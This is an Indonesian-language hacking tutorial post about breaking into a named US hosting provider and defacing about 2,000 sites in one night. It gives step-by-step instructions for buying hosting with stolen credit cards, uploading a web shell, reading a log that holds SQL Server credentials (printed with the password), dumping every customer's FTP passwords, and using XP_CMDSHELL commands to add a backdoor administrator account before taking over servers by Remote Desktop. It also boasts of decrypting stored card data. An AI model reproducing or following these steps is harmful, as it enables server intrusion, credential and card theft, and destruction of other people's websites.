HAck codex

Lebih dari 2000 Situs Dideface Dalam Satu Malam

Edthosting.com adalah salah satu hosting service yang cukup besar di US sono, tapi anehnya banyak sekali celah-celah keamanan yang ada. Salah satu celah keamanan yang cukup besar yaitu di bagian yang sering disebut FSO (File System Object). Untuk mengetahui lebih detail mengenai fso silahkan saja kunjungi situs Microsoft atau lainnya karena gue malas ngejelasin disini.

Untuk lebih jelas sekarang kita langsung saja praktek.

Bahan yang diperlukan:

1. Sedikit pengetahuan tentang Asp/Asp.Net

2. Sedikit pengetahuan tentang SQL Server

3. Sedikit pengetahuan tentang DOS Command

4. Script ASPY.ASP buatan Vela iNC , download di http://www.Planet-Source-Code.com

5. Hosting Account di edthosting.com yang dapat dibeli dengan kartu kredit curian, dengan menggunakan proxy US. Dibawah akan dilampirkan beberapa hosting account dengan passwordnya.

Sekarang kita mulai:

1. Apabila anda sudah mempunyai hosting account maka upload file aspy.asp ke directory utama anda dengan gunakan ftp. Kemudian panggil aspy.asp lewat web browser anda (http://situs-anda.com/aspy.asp) dan default passwordnya adalah “password” (tanpa tanda kutip) kemudian tekan enter.

2. Anda akan melihat bahwa directory anda berada di “c:\inetpub\website\situs-anda_com”. Sekarang coba anda ganti menjadi “c:\inetpub\website\” dan binggo anda akan melihat seluruh hosting account yang ada pada server tersebut dan silahkan anda menjelajahi semua directory yang ada didalam server tersebut termasuk ke directory “c:\”.

3. Apabila anda teliti anda akan menemukan file c:\trace.log yang berisi user dan password SQL server. Pilih File tersebut kemudian clik “edit”, Dari file trace.log tersebut didapat hasil yaitu :

a. Nama SQL Server : http://www.empiredatatech.com

b. Username : card471

c. Password : ty38vxqxxx

d. Default database: EDT

Setelah saya teliti ternyata user tersebut mempunyai hak sebagai SA pada SQL server tersebut. Kita jelajahi lebih jauh tentang database EDT pada server tersebut.

4. Jalankan SQL query analyser pada ASPY.ASP (pojok kanan atas), masukkan: “Driver={SQL Server}; Server=www.empiredatatech.com ; Database=EDT; DSN=; UID=card471; PWD=ty38vxq|06;” pada connection string (tanpa tanda kutip). Kemudian klik “table”. Maka akan melihat seluruh table yang ada pada Database tersebut. Table yang cukup penting adalah FTP_User_info. Untuk melihat data yang terdapat pada tabel tersebut masukkan “SELECT * FROM FTP_USER_INFO” dan binggo!! Anda akan melihat seluruh user ftp beserta passwordnya diseluruh server yang ada di hosting service tersebut. Pada langkah ini saja anda sudah bisa mendeface seluruh site yang ada pada database tersebut melalui ftp. Jadi bukan hal susah bagi Edan_Tenanan untuk mendeface kurang lebih 2500 situs dalam satu malam dengan munggunakan FTP Account, tapi ada cara yang lebih cepat dan mudah yang akan dijelaskan dibawah.

5. Dari database EDT didapat berbagai kesimpulan yaitu:

a. Hosting service ini terdiri dari 11 server shared hosting mulai dari yang nama servernya http://www.empiredatatech.com, ww2.empiredatatech.com, sampai ww11.empiredatatech.com dimana semua server memiliki hampir 300 shared hosting dan memiliki SQL server dimana user card471 memiliki hak sebagai sistem administrator (SA).

b. Hosting ini juga memiliki puluhan VPS (virtual private hosting) yang dapat diakses melalui remote desktop. Dan juga memiliki beberapa Dedicated server diantaranya EDTDSA, EDTDSB, EDTDSC dan lain-lain.

6. Apabila kita mau melihat semua database yang ada pada salah satu server kita dapat gunain Http://enterprisemanager.edthosting.com, disini kita juga bisa membuat user yang mempunya hak sebagai sa asalkan kita login sebagai card471 yang mempunyai hak sebagai sa. Bagi yang tertarik dengan kartu kredit silahkan cari sendiri didalam Semua SQL server tersebut satu-persatu. Kebanyakan situs toko yang ada EDTHOSTING menggunakan shoppingcart ASPdotNETstorefront yang mana data kartu kredit beserta CVV-nya telah ter-enkripsi, tapi jangan takut Edan Tenanan bisa menanggulanginya, kalo ada belum tau tanya aja pasti dijawab, tapi kalo udah tau jangan ngoceh hehehehehe

7. Sekarang yang jadi pertanyaan bagaimana edan_tenanan dapat mendeface/mematikan (nggak jelas deface itu bagaimana gue nggak ngerti) seluruh situs hanya dalam waktu satu malam ???????

OK sekarang gue jelasin bagaimana Edan_tenanan dapat menghancurkan seluruh site tersebut .

1. Masuk di http://enterprisemanager.edthosting.com pilih asp enterprisemanager kemudian login server: http://www.empiredatatech.com dengan user: card471 pass: ty38vxq|06 kemudian jalankan Query:

a. XP_CMDSHELL ‘Net user edan tenanan /add’ perintah ini untuk menambahkan user: edan password: tenanan pada komputer server

b. XP_CMDSHELL ‘Net localgroup Administrators edan /add’ perintah ini untuk menjadikan user edan sebagai user dengan hak administrators

2. Jalankan RemoteDesktop (windows XP keatas) kemudian masukkan namaserver (dalam hal ini http://www.empiredatatech.com) kemudian klik connect, tunggu sebentar lalu masukkan user: edan Password:tenanan kemudian pilih OK. Binggo !! Edan Tenanan telah remote ke server dan bisa mematikan atau mendelete semua hosting service yang ada pada IIS servernya termasuk memodifikasi DNS nya, Menjalankan proxy server, menjalankan trojan, menjalankan BOT RagnaRok dan lain-lain.

3. Anda bisa melakukan hal tersebut pada 10 server yang lain, selama IP anda tidak diblokir oleh firewall hehehehe.

4. Bagaimana caranya agar password user Administrator? Caranya dengan perintah ‘Net user Administrator passbaru’ .

CATATAN:

-. Bagi yang merasa memata-matai edan_tenanan, kita peace aza ok!!

-. Thanks to Underwater-hacker:ZaythetGreat, MC-Arief, ASPY.ASP maker Vela iNC,

-. Bagi para suhu di yogya family code thanks yahh.

Edited by Jasakom WebMaster